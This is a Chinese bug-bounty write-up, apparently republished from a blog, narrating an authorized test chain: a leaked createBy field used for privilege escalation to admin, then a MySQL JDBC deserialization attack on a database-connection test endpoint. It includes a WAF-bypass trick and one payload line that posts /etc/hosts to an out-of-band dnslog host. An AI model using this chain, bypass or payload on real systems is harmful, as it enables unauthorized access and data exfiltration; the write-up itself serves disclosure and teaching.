文章总结： 这篇文章记录了一次从普通参数发现到反序列化漏洞利用的完整安全测试过程。作者通过分析返回包中的createBy参数，识别出这是用户唯一标识accountId，利用该参数实现了越权获取管理员信息。登录后台后，发现数据库连接测试接口，通过MySQL反序列化漏洞成功执行命令。作者建议安全测试人员关注返回包中的隐藏参数如createBy、updateBy等，以及JS中含testConnection等关键字的接口，这些可能是越权测试和漏洞挖掘的重要突破口。 综合评分： 93 文章分类： SRC活动,渗透测试,漏洞分析,WEB安全,实战经验

从createBy参数到反序列化的src挖掘记录

原创

小乳酸

网络安全之旅

2025年8月9日 11:46 江苏

0x01 前言

在日常 SRC 挖掘中，经常会遇到一些看似“平平无奇”的返回参数，稍加分析就可能牵出更深层的漏洞链。

0x02 漏洞背景

一次众测项目，授权对目标子域进行渗透，本次针对目标网站 www.xxx.com 的测试中，我通过一次简单的参数联想，成功打通了从普通用户到管理员再到后端数据库反序列化利用的全链路过程。

0x03 漏洞挖掘过程

1. 参数发现

注册一个普通账号并登录，进入站点后进行功能探索（俗称“疯狂点点点”）。在一次抓包过程中，我发现返回数据包中存在一个字段：

“createBy”: “xxxxxxxxx”

该值为一串不可遍历的数字，经过与个人信息接口对比，确认该字段实际对应用户的 accountId参数（用户唯一标识） 。

2. 越权获取管理员信息

提取前端所有JS 接口，在请求参数中直接添加 accountId=目标值(即获取的createBy的值)进行访问。

分别对 GET 和 POST 方式接口进行测试，在一个接口中成功返回了管理员账号信息：

{

“accountId”: “xxxxxxxxxx”,

“role”: “admin”,

“username”: “admin”,

…

}

3. 登录管理员账号

使用泄露到的管理员凭据成功登录后台，继续点点点，发现加载的 JS 文件在 HAE 插件中高亮报红，触发的规则为 testConnection 关键字，类似的还有dbtest，dbConnection关键字等等，大家可以把它加入到HAE规则中去。

4. 数据源接口利用链

进一步分析接口发现 /datasoure/testConnection 接口允许用户提交数据库连接信息以测试数据库连接，继续分析js获取参数。

参数示例：

{

“Url”: “jdbc:mysql://127.0.0.1:3306/test”,

“username”: “root”,

“password”: “123456”,

“driver”: “xxxxxx”

}

对于数据库连接处，我通常会测试jdbc任意文件读取、JDBC 反序列化执行、PostgreSQL任意代码执行、盲SSRF等等。

在测试过程中，存在 WAF 拦截jdbc:字符串，绕过方式：在 jdbc 前后分别添加一个无关参数 a=xxxx，其中 xxxx 为大量空格，可绕过waf。

最终也是通过mysql反序列化成功执行命令带出数据。 “username”: “yso_Fastjson1_curl -X POST -d @/etc/hosts http://xxx.dnslog.cn”

0x04 厂商反馈

向厂商提交漏洞详情后，厂商确认漏洞存在，最终获得 5400 元赏金。

0x05 总结

1. 关注返回包中的createBy、updateBy等隐藏参数，这类参数可能对应用户唯一标识（如accountId），是越权测试的重要突破口。      2. 关注 Js 中含testConnection、dbtest、dbConnection等关键字的接口，可通过 HAE 插件自定义规则高亮此类接口，快速定位数据库连接、测试类等高危功能点。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式详见页面底部说明板块。

本文转载自：网络安全之旅 小乳酸《从createBy参数到反序列化的src挖掘记录》